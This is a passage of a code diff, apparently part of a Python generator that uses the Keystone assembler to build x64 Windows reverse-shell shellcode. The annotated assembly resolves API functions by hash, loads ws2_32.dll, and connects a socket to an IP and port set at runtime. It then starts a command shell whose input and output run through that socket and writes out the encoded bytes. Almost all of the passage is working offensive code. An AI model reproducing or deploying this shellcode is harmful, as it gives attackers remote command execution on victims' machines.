+" mov r14d, dword ptr [r15 + 0x20];" # Get the RVA of ENPT +" add r14, r9;" # R14 stores the VMA of ENPT + +"search_function:" # Search for a given function +" jrcxz not_found;" # If RCX is 0, the given function is not found +" dec ecx;" # Decrease index by 1 +" xor rsi, rsi;" +" mov esi, [r14 + rcx*4];" # RVA of function name string +" add rsi, r9;" # RSI points to function name string + +"function_hashing:" # Hash function name function +" xor rax, rax;" +" xor rdx, rdx;" +" cld;" # Clear DF flag + +"iteration:" # Iterate over each byte +" lodsb;" # Copy the next byte of RSI to Al +" test al, al;" # If reaching the end of the string +" jz compare_hash;" # Compare hash +" ror edx, 0x0d;" # Part of hash algorithm +" add edx, eax;" # Part of hash algorithm +" jmp iteration;" # Next byte + +"compare_hash:" # Compare hash +" cmp edx, r8d;" +" jnz search_function;" # If not equal, search the previous function (index decreases) +" mov r10d, [r15 + 0x24];" # Ordinal table RVA +" add r10, r9;" # Ordinal table VMA +" movzx ecx, word ptr [r10 + 2*rcx];" # Ordinal value -1 +" mov r11d, [r15 + 0x1c];" # RVA of EAT +" add r11, r9;" # VMA of EAT +" mov eax, [r11 + 4*rcx];" # RAX stores RVA of the function +" add rax, r9;" # RAX stores VMA of the function +" ret;" +"not_found:" +" ret;" + +"jump_section:" # Achieve PIC and elminiate 0x00 byte +" mov rbp, r9;" # RBP stores base address of Kernel32.dll +" mov r8d, 0xec0e4e8e;" # LoadLibraryA Hash +" call parse_module;" # Search LoadLibraryA's address +" mov r12, rax;" # R12 stores the address of LoadLibraryA function + +"load_module:" +" xor rax, rax;" +" mov ax, 0x6c6c;" # Save the string "ll" to RAX +" push rax;" # Push the string to the stack +" mov rax, 0x642E32335F325357;" # Save the string "WS2_32.D" to RAX +" push rax;" # Push the string to the stack +" mov rcx, rsp;" # RCX points to the "WS2_32.dll" string +" sub rsp, 0x20;" # Function prologue +" mov rax, r12;" # RAX stores address of LoadLibraryA function +" call rax;" # LoadLibraryA("ws2_32.dll") +" add rsp, 0x20;" # Function epilogue +" mov r14, rax;" # R14 stores the base address of ws2_32.dll + +"call_wsastartup:" +" mov r9, rax;" # R9 stores the base address of ws2_32.dll +" mov r8d, 0x3bfcedcb;" # Hash of WSAStartup +" mov rbx, r9;" # Save the base address of ws2_32.dll to RBX for later use +" call parse_module;" # Search for and get the address of WSAStartup +" xor rcx, rcx;" +" mov cx, 0x198;" +" sub rsp, rcx;" # Reserve enough space for the lpWSDATA structure +" lea rdx, [rsp];" # Assign the address of lpWSAData to the RDX register as the 2nd parameter +" mov cx, 0x202;" # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter +" sub rsp, 0x30;" # Function prologue +" call rax;" # Call WSAStartup +" add rsp, 0x30;" # Function epilogue + +"call_wsasocket:" +" mov r9, rbx;" +" mov r8d, 0xadf509d9;" # Hash of WSASocketA function +" call parse_module;" # Get the address of WSASocketA function +" sub rsp, 0x30;" # Function prologue +" xor rcx, rcx;" +" mov cl, 2;" # AF is 2 as the 1st parameter +" xor rdx, rdx;" +" mov dl, 1;" # Type is 1 as the 2nd parameter +" xor r8, r8;" +" mov r8b, 6;" # Protocol is 6 as the 3rd parameter +" xor r9, r9;" # lpProtocolInfo is 0 as the 4th parameter +" mov [rsp+0x20], r9;" # g is 0 as the 5th parameter, stored on the stack +" mov [rsp+0x28], r9;" # dwFlags is 0 as the 6th parameter, stored on the stack +" call rax;" # Call WSASocketA function +" mov r12, rax;" # Save the returned socket type return value in R12 to prevent data loss in RAX +" add rsp, 0x30;" # Function epilogue + +"call_wsaconnect:" +" mov r9, rbx;" +" mov r8d, 0xb32dba0c;" # Hash of WSAConnect +" call parse_module;" # Get the address of WSAConnect +" sub rsp, 0x20;" # Allocate enough space for the socketaddr structure +" mov rcx, r12;" # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter +" xor rdx, rdx;" +" mov dl, 2;" # Set sin_family to AF_INET (=2) +" mov [rsp], rdx;" # Store the socketaddr structure +" xor rdx, rdx;" +f"{port_argument}" # Set local port dynamically +" mov [rsp+2], rdx;" # Pass the port value to the corresponding position in the socketaddr structure +f"{ip_argument}" +" mov [rsp+4], rdx;" # Pass IP to the corresponding position in the socketaddr structure +# " xor r8, r8;" +# " mov [rsp+8], r8;" # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working +" lea rdx, [rsp];" # Pointer to the socketaddr structure as the 2nd parameter +" xor r8, r8;" +" mov r8b, 0x16;" # Set namelen member to 0x16 +" xor r9, r9;" # lpCallerData is 0 as the 4th parameter +" sub rsp, 0x38;" # Function prologue +" mov [rsp+0x20], r9;" # lpCalleeData is 0 as the 5th parameter +" mov [rsp+0x28], r9;" # lpSQOS is 0 as the 6th parameter +" mov [rsp+0x30], r9;" # lpGQOS is 0 as the 7th parameter +" call rax;" # Call WSAConnect +" add rsp, 0x38;" # Function epilogue + +"call_createprocess:" +" mov r9, rbp;" # R9 stores the base address of Kernel32.dll +" mov r8d, 0x16b3fe72;" # Hash of CreateProcessA +" call parse_module;" # Get the address of CreateProcessA +f"{shell_type}" +" push rdx;" +" mov rdx, rsp;" # Pointer to "cmd.exe" is stored in the RCX register +" push r12;" # The member STDERROR is the return value of WSASocketA +" push r12;" # The member STDOUTPUT is the return value of WSASocketA +" push r12;" # The member STDINPUT is the return value of WSASocketA +" xor rcx, rcx;" +" push cx;" # Pad with 0x00 before pushing the dwFlags member, only the total size matters +" push rcx;" +" push rcx;" +" mov cl, 0xff;" +" inc cx;" # 0xff+1=0x100 +" push cx;" # dwFlags=0x100 +" xor rcx, rcx;" +" push cx;" # Pad with 0 before pushing the cb member, only the total size matters +" push cx;" +" push rcx;" +" push rcx;" +" push rcx;" +" push rcx;" +" push rcx;" +" push rcx;" +" mov cl, 0x68;" +" push rcx;" # cb=0x68 +" mov rdi, rsp;" # Pointer to STARTINFOA structure +" mov rcx, rsp;" +" sub rcx, 0x20;" # Reserve enough space for the ProcessInformation structure +" push rcx;" # Address of the ProcessInformation structure as the 10th parameter +" push rdi;" # Address of the STARTINFOA structure as the 9th parameter +" xor rcx, rcx;" +" push rcx;" # Value of lpCurrentDirectory is 0 as the 8th parameter +" push rcx;" # lpEnvironment=0 as the 7th argument +" push rcx;" # dwCreationFlags=0 as the 6th argument +" inc rcx;" +" push rcx;" # Value of bInheritHandles is 1 as the 5th parameter +" dec cl;" +" push rcx;" # Reserve space for the function return area (4th parameter) +" push rcx;" # Reserve space for the function return area (3rd parameter) +" push rcx;" # Reserve space for the function return area (2nd parameter) +" push rcx;" # Reserve space for the function return area (1st parameter) +" mov r8, rcx;" # lpProcessAttributes value is 0 as the 3rd parameter +" mov r9, rcx;" # lpThreatAttributes value is 0 as the 4th parameter +" call rax;" # Call CreateProcessA +) + + ks = Ks(KS_ARCH_X86, KS_MODE_64) + encoding, count = ks.asm(CODE) + output_shellcode(lan,encoding,var,save) \ No newline at end of file